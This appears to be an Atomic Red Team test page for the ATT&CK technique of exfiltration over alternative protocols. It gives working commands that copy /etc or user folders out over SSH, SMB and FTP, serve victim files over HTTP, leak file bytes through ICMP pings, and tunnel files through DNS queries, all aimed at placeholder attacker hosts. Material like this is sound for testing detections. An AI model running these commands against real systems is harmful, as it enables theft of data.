# T1048 - Exfiltration Over Alternative Protocol
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1048)
<blockquote>Data exfiltration is performed with a different protocol from the main command and control protocol or channel. The data is likely to be sent to an alternate network location from the main command and control server. Alternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not being used as the main command and control channel. Different channels could include Internet Web services such as cloud storage.

Adversaries may leverage various operating system utilities to exfiltrate data over an alternative protocol. 

SMB command-line example:

* <code>net use \\\attacker_system\IPC$ /user:username password && xcopy /S /H /C /Y C:\Users\\* \\\attacker_system\share_folder\</code>

Anonymous FTP command-line example:(Citation: Palo Alto OilRig Oct 2016)

* <code>echo PUT C:\Path\to\file.txt | ftp -A attacker_system</code>
</blockquote>

## Atomic Tests

- [Atomic Test #1 - Exfiltration Over Alternative Protocol - SSH](#atomic-test-1---exfiltration-over-alternative-protocol---ssh)

- [Atomic Test #2 - Exfiltration Over Alternative Protocol - SSH](#atomic-test-2---exfiltration-over-alternative-protocol---ssh)

- [Atomic Test #3 - Exfiltration Over Alternative Protocol - HTTP](#atomic-test-3---exfiltration-over-alternative-protocol---http)

- [Atomic Test #4 - Exfiltration Over Alternative Protocol - ICMP](#atomic-test-4---exfiltration-over-alternative-protocol---icmp)

- [Atomic Test #4 - Exfiltration Over Alternative Protocol - DNS](#atomic-test-4---exfiltration-over-alternative-protocol---icmp)

<br/>

## Atomic Test #1 - Exfiltration Over Alternative Protocol - SSH
Input a domain and test Exfiltration over SSH

Remote to Local

**Supported Platforms:** macOS, Linux


#### Inputs:
| Name | Description | Type | Default Value | 
|------|-------------|------|---------------|
| domain | target SSH domain | url | target.example.com|
| user_name | username for domain | string | atomic|
| password | password for user | string | atomic|


#### Attack Commands: Run with `sh`! 
```
ssh #{domain} "(cd /etc && tar -zcvf - *)" > ./etc.tar.gz
```






<br/>
<br/>

## Atomic Test #2 - Exfiltration Over Alternative Protocol - SSH
Input a domain and test Exfiltration over SSH

Local to Remote

**Supported Platforms:** macOS, Linux


#### Inputs:
| Name | Description | Type | Default Value | 
|------|-------------|------|---------------|
| domain | target SSH domain | url | target.example.com|
| user_name | username for domain | string | atomic|
| password | password for user | string | atomic|


#### Attack Commands: Run with `sh`! 
```
tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh #{user_name}@#{domain} 'cat > /Users.tar.gz.enc'
```






<br/>
<br/>

## Atomic Test #3 - Exfiltration Over Alternative Protocol - HTTP
A firewall rule (iptables or firewalld) will be needed to allow exfiltration on port 1337.

**Supported Platforms:** macOS, Linux


#### Run it with these steps! 1. Victim System Configuration:

    mkdir /tmp/victim-staging-area
    echo "this file will be exfiltrated" > /tmp/victim-staging-area/victim-file.txt

2. Using Python to establish a one-line HTTP server on victim system:

    cd /tmp/victim-staging-area
    python -m SimpleHTTPServer 1337

3. To retrieve the data from an adversary system:

    wget http://VICTIM_IP:1337/victim-file.txt







<br/>
<br/>

## Atomic Test #4 - Exfiltration Over Alternative Protocol - ICMP
Exfiltration of specified file over ICMP protocol.

**Supported Platforms:** Windows


#### Inputs:
| Name | Description | Type | Default Value | 
|------|-------------|------|---------------|
| input_file | Path to file to be exfiltrated. | Path | C:\Windows\System32\notepad.exe|
| ip_address | Destination IP address where the data should be sent. | String | 127.0.0.1|


#### Attack Commands: Run with `powershell`! 
```
$ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Content -Path #{input_file} -Encoding Byte -ReadCount 1024) { $ping.Send("#{ip_address}", 1500, $Data) }
```






<br/>

## Atomic Test #5 - Exfiltration Over Alternative Protocol - DNS
Exfiltration of specified file using DNS. A domain name (example.com) and a hosting server is required. In your domain control panel, configure the below DNS settings:

a) Create an A record ns1.example.com that points to the server IP. 

b) Set the NS record (ns2.example.com) to point to the server (ns1.example.com).

**Supported Platforms:** Linux

#### Inputs:
| Name | Description | Type | Default Value | 
|------|-------------|------|---------------|
| domain | target DNS domain | url | ns2.example.com|
| input_file | Path to file to be exfiltrated. | Path | ./example.txt|
| output_file | Filename of the data exfiltrated | string | received_data.txt|


#### Adversary machine: Run with `sh`! 

1. On the adversary machine run the below command.

tshark -f "udp port 53" -Y "dns.qry.type == 1 and dns.flags.response == 0 and dns.qry.name matches ".domain"" >> received_data.txt

#### Attack Commands: Run with `sh`! 

2. On the victim machine run the below commands.

xxd -p input_file > encoded_data.hex | for data in `cat encoded_data.hex`; do dig $data.domain; done

#### Recover data by running the below commands. Run with `sh`! 

3. Once the data is received, use the below command to recover the data.

cat output_file | cut -d "A" -f 2 | cut -d " " -f 2 | cut -d "." -f 1 | sort | uniq | xxd -p -r

<br/>
<br/>
